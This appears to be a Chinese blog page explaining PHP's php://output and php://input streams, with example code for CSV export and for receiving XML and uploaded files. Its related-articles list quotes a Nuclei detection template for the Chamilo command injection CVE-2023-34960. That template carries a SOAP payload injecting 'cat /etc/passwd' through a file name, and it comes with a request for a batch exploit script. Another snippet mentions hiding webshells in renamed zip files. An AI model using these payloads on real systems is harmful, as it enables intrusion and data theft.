php://input、php://output用法解析

最新推荐文章于 2025-06-01 15:44:57 发布
原创 最新推荐文章于 2025-06-01 15:44:57 发布 · 3.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

本文详细介绍了php://output作为输出流在CLI和HTTP模式下的使用,包括如何向终端输出内容和导出CSV文件。同时,文章探讨了php://input输入流的应用,如接收XML和JSON数据,以及如何通过它来接收文件内容,强调在实际应用中推荐使用multipart/form-data的方式。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、php://output输出流用法:

php://output是php语言中一个只写的数据流,向“php://input”写入的数据将像 print() 和 echo() 一样的方式 写入到输出缓冲区;“php://output”支持CLI(command-line interface,命令行界面)模式和Http模式;

1 、CLI模式通过php://output向终端输出内容:

test.php文件:

<?php
$output = fopen("php://output", "w");
fwrite($output, "爱E族");
fclose($output);

输出:

[root@aiezu.com ~]# php test.php
爱E族

2、Http模式通过php://output导出csv文件:

注意,以UTF8编码导出CSV文件,如果文件头未添加BOM头,使用Excel打开会出现乱码。

test.php页面代码:

<?php
header('Content-Type: application/csv');
header('Content-Disposition: attachment; filename="test.csv"');
$output = fopen('php://output','w') or die("Can't open php://output");
//UTF8 csv文件头前需添加BOM,不然会是乱码
fwrite($output, chr(0xEF).chr(0xBB).chr(0xBF));
// 输出标题行
fputcsv($output, array('站点名', '域名', '行业'));
//数据内容
$rows = array(
     array('天猫', 'http://tmall.com', '电子商务')
    ,array('爱E族', 'http://aiezu.com', '互联网技术')
    ,array('腾讯', 'http://qq.com', '社交网络')
);
foreach($rows as $row) {
    fputcsv($output, $row);
}
fclose($output) or die("Can't close php://output");

二、php://input输入流用法:

php://input是php语言中一个只读的数据流;通过"php://input",可以读取从Http客户端以POST方式提交、请求头“Content-Type”值非"multipart/form-data​"的所有数据;"php://input"一般用来读取POST上来,除已被处理以外的剩余数据。

1、PHP使用"php://input"接收XML数据:

ttp test.php页面代码:

<?php
/**
* xml文档转为数组元素
* @param obj $xmlobject XML文档对象
* @return array
*/
function xmlToArray($xmlobject) {
   $data = array();
   foreach ((array)$xmlobject as $key => $value) {
       $data[$key] = !is_string($value) ? xmlToArray($value) : $value;
   }
   return $data;
}
 
if ( strtolower($_SERVER['CONTENT_TYPE']) == 'application/xml' && $content = file_get_contents("php://input") ) {
   $xml = simplexml_load_string($content);//转换post数据为simplexml对象
   print_r(xmlToArray($xml));
}

待提交xml.xml文件内容:

<?xml version='1.0' encoding='UTF-8'?>
<root>
 <site>
   <name>爱E族</name>
   <domain>aiezu.com</domain>
 </site>
 <site>
   <name>天猫</name>
   <domain>tmall.com</domain>
 </site>
</root>

通过linux curl命令提交xml.xml:

[root@aiezu.com ~]# curl -H "Content-Type: application/xml" --data-binary @xml.xml http://aiezu.com/test.php
Array
(
   [site] => Array
       (
           [0] => Array
               (
                   [name] => 爱E族
                   [domain] => aiezu.com
               )
           [1] => Array
               (
                   [name] => 天猫
                   [domain] => tmall.com
               )
       )
)

2、PHP使用"php://input"接收JSON数据:

PHP使用"php://input"接收JSON数据,与接收XML数据十分类似,这里不再做介绍,要查看实例请参考:Linux curl命令get/post提交数据、json和文件全攻略 页面的第“六”节。

3、PHP使用"php://input"接收文件内容:

下面通过代码演示PHP使用"php://input"接收一个png文件,这里只是用于演示,实际运用中还是建议使用Http请求头"Content-Type"值为"multipart/form-data"的表单方式POST。

接收页面"test.php"代码:

<?php
if ( preg_match("#^image/(png|jpe?g|gif)$#i", $_SERVER['CONTENT_TYPE'], $match) && $binary = file_get_contents("php://input") ) {
   $file = sprintf("/tmp/pic.%s", strtolower($match[1]));
   file_put_contents($file, $binary);
   echo sprintf("文件大小: %s\n", filesize($file));
   echo sprintf("修改时间: %s\n", date("Y-m-d H:i:s", filemtime($file)));
}

提交测试:

[root@aiezu.com ~]# curl -H "Content-Type: image/png" --data-binary @logo.png http://aiezu.com/test.php
文件大小: 3706
修改时间: 2016-12-05 13:29:08

总结

"php://input"一般用来读取POST上来
php://output用法解析:将PHP数据发送到输出流
PeGroovy的博客
09-17 541
使用php://output的主要优点是它可以节省服务器内存,因为数据直接从PHP脚本发送到输出缓冲区,而不需要在服务器内存中保存大量数据。在PHP中,php://output是一个特殊的I/O流,它允许将数据直接发送到输出缓冲区,然后将其发送到Web浏览器或其他输出设备。总结一下,php://output是一个强大的PHP功能,它允许将数据直接发送到输出流,方便地将动态生成的内容发送到浏览器或其他输出设备。值得注意的是,在使用php://output时,必须确保没有其他输出被发送到浏览器或输出设备。
php案例:php://output的运用(不用来保存文件)
qq_37805832的博客
12-22 830
在学习一个php案例。
谈一谈php://inputphp://output
qq6746的博客
01-30 207
对一php://input介绍,PHP官方手册文档有一段话对它进行了很明确地概述。 php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA(原生的post数据),因为它不依赖于特定的 php.ini 指令,内存消耗更少 “php://input allows you to read raw POST data. It is a less memory intensive alternative.
php案例 php://output
最新发布
qq_37805832的博客
06-01 205
完全相同,但使用了更底层的流操作方式。这段代码的实际效果与直接写echo “666。
PHP输入流php://input
学习、思考、分享
08-19 9462
在使用xml-rpc的时候,server端获取client数据,主要是通过php输入流input,而不是$_POST数组。所以,这里主要探讨php输入流php://input    对一php://input介绍,PHP官方手册文档有一段话对它进行了很明确地概述。
解析强网拟态题目EasyFilter的php://filter逻辑
这部分代码检查了路径的不同部分,如`temp`、`memory`、`output`、`input`等,并对`stdin`、`stdout`和`stderr`进行了特判。当路径匹配到`filter/`开头时,进入到了处理过滤器逻辑的分支,这部分代码可能与题目中的...
id: CVE-2023-34960 info: name: Chamilo Command Injection author: DhiyaneshDK severity: critical description: | A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS. reference: - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py - http://chamilo.com - http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html - https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 epss-score: 0.93314 epss-percentile: 0.99067 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: chamilo product: chamilo shodan-query: - http.component:"Chamilo" - http.component:"chamilo" - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve,cve2023,packetstorm,chamilo http: - raw: - | POST /main/webservices/additional_webservices.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{RootURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope> matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: word part: header words: - text/xml - type: status status: - 200 # digest: 4a0a00473045022034e60ad33e2160ec78cbef2c6c410b14dabd6c3ca8518c21571e310453a24e25022100927e4973b55f38f2cc8ceca640925b7066d4325032b04fb0eca080984080a1d0:922c64590222798bb761d5b6d8e72950根据poc实现python的exp,并且读取当前目录下的文件 批量执行 ,例如,python CVE-2023-34960.py -f .8.txt -c "需要执行的命令" 并将执行成功的结果输出 -o 9.txt 添加选项-o 8.txt的文本文件
03-27
另外,需要注意命令中的特殊字符需要进行适当的URL编码或XML转义,比如<、>、&等,在XML中需要使用实体编码,否则可能导致SOAP解析错误。 例如,如果用户命令是whoami,则payload可能是: <value xsi:type="xsd:...
php伪协议介绍
qq_74263993的博客
11-09 674
将一句话木马(shell.php)压缩成压缩包形式(shell.zip),将压缩包后缀改为.jpg(shell.jpg)或者png。file:// 用于访问本地文件系统,比如:在CTF中通常用来读取本地文件的且不受配置文件中allow_url_fopen与allow_url_include的影响。:一般配合post输入,它提供了一种直接获取 POST 请求数据的方式,尤其适用于处理来自客户端的原始数据,适合执行php文件。(当可以使用php://filter,但是。--------本地文件传输协议。
深入理解IP地址与端口:网络通信的基石
和舒貌的博客
02-20 1223
网络通信本质上是设备间的数据交换过程
php://inputphp://output
weixin_34258078的博客
04-05 354
2019独角兽企业重金招聘Python工程师标准>>> ...
php://input
zxr的博客
08-09 893
$_POST:通过 HTTP POST 方法传递的变量组成的数组。是自动全局变量。 $GLOBALS['HTTP_RAW_POST_DATA']:此变量仅在碰到未识别 MIME 类型的数据时产生。例如:$HTTP_RAW_POST_DATA 对于 enctype="multipart/form-data" 表单数据不可用。 php://input:相当于$GLOBALS['HTTP_RAW_P...
php://inputphp://output
laiyijian的博客
04-11 808
php://input 数据输入流,可以用file_get_contents("php://input")获取
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值